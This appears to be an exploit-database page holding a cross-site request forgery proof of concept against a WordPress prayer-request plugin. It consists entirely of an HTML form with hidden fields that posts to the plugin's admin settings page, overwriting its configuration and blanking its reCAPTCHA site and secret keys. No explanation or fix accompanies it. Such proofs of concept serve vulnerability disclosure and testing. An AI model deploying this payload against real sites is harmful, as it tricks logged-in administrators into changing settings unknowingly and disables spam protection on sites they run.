Share
## https://sploitus.com/exploit?id=WPEX-ID:E4F17C7B-06A6-469D-A128-27A51E36493D
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?page=wpe_manage_settings" method="POST" enctype="multipart/form-data">
<input type="hidden" name="wpe_prayer_form_title" value="CSRF Attack" />
<input type="hidden" name="wpe_prayer_list_title" value="" />
<input type="hidden" name="wpe_praise_list_title" value="" />
<input type="hidden" name="wpe_num_prayer_per_page" value="" />
<input type="hidden" name="wpe_prayer_btn_color" value="" />
<input type="hidden" name="wpe_prayer_btn_text_color" value="" />
<input type="hidden" name="wpe_pray_btn_color" value="" />
<input type="hidden" name="wpe_pray_text_color" value="" />
<input type="hidden" name="wpe_terms_and_condition" value="" />
<input type="hidden" name="wpe_num_of_characters_in_message" value="" />
<input type="hidden" name="wpe_prayer_Site_Key" value="" />
<input type="hidden" name="wpe_prayer_secret_key" value="" />
<input type="hidden" name="wpe_prayer_time_interval" value="" />
<input type="hidden" name="wpe_categorylist" value="Deliverance,Generational Healing,Inner Healing,Physical Healing,Protection,Relationships,Salvation,Spiritual Healing" />
<input type="hidden" name="wpe_fetch_req_from" value="all" />
<input type="hidden" name="wpe_save_settings" value="Save Settings" />
<input type="hidden" name="operation" value="save" />
<input type="hidden" name="page_options" value="wpe_api_key,wpe_scripts_place" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>